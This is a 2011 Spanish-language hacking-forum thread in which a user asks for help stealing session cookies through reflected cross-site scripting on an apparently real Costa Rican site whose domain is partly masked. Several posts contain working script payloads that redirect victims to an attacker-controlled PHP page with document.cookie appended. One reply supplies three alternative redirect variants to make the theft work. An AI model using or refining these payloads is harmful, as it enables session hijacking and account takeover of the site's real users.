elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Cross Site Scripting
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Cross Site Scripting  (Leído 3,600 veces)
pelonms7

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Cross Site Scripting
« en: 11 Febrero 2011, 03:29 am »

Saludos,

Estuve intentando el tutorial (http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.45.html)  y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo

asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

como puedo hacer para que se ejecute? Saludos
En línea

Costa Rica WOW!!!!
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.706


WOS & Khan & Calero LDN


Ver Perfil WWW
Re: Cross Site Scripting
« Respuesta #1 en: 11 Febrero 2011, 04:09 am »

Pero no entiendo, se produce o no el XSS?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
pelonms7

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: Cross Site Scripting
« Respuesta #2 en: 11 Febrero 2011, 04:21 am »

Si claro la pagina es vulnerable pero parece que falta la parte de &buscar=; para que se ejecute el grabar las cookies de los usuarios, por eso preguntaba que si se puede poner algo en ves de ese &buscar=;

o como podria estar mejor hecho el script
En línea

Costa Rica WOW!!!!
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.706


WOS & Khan & Calero LDN


Ver Perfil WWW
Re: Cross Site Scripting
« Respuesta #3 en: 11 Febrero 2011, 04:52 am »

Pero eso es lo que no entiendo, todas las paginas no son iguales. Y si se ejecuta el XSS cual es el problema?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
pelonms7

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: Cross Site Scripting
« Respuesta #4 en: 11 Febrero 2011, 05:10 am »

Por ejemplo asi es como se ve el URL de la pagina

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=0

yo quito el "0" y pongo <script>alert(document.cookie)</script> y me muestra la cookie de session que estoy utilizando

intente este script para que me lleve al dominio donde tengo el archivo php que guarda las cookies, pero no me esta llevando a mi sitio, este es el script

<script>location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

asi es como se ve el URL con el script

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>


pero no me lleva a mi sitio, hay algun error en el script?

saludos
En línea

Costa Rica WOW!!!!
4rkn63l

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Re: Cross Site Scripting
« Respuesta #5 en: 5 Marzo 2011, 22:12 pm »

Hay otras formas de redireccionar como estas:

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>window.location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>document.location.href='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>location.assign('http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie);</script>

Aca te dejo un tuto bastante bueno y claro por si te interesa: http://4party.cuatrovientos.org/files/xssjavascript.pdf


En línea

pelonms7

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: Cross Site Scripting
« Respuesta #6 en: 7 Marzo 2011, 03:20 am »

Excelente voy a intentar esto muchas gracias
En línea

Costa Rica WOW!!!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Los Poderes Secretos de XSS (Cross Site Scripting) « 1 2 3 4 »
Tutoriales - Documentación
sirdarckcat 32 60,253 Último mensaje 7 Junio 2012, 11:19 am
por adastra
Cross Site Scripting (XSS)
Nivel Web
yeikos 3 4,790 Último mensaje 28 Mayo 2007, 05:59 am
por Man-In-the-Middle
Cross Site Scripting « 1 2 »
Nivel Web
berni69 11 5,460 Último mensaje 20 Julio 2007, 16:24 pm
por Tengu
DOM-based Cross-Site Scripting
Nivel Web
.:UND3R:. 2 4,376 Último mensaje 24 Noviembre 2011, 16:04 pm
por WHK
Cross-site scripting en Skype
Noticias
wolfbcn 4 2,259 Último mensaje 18 Julio 2011, 12:35 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines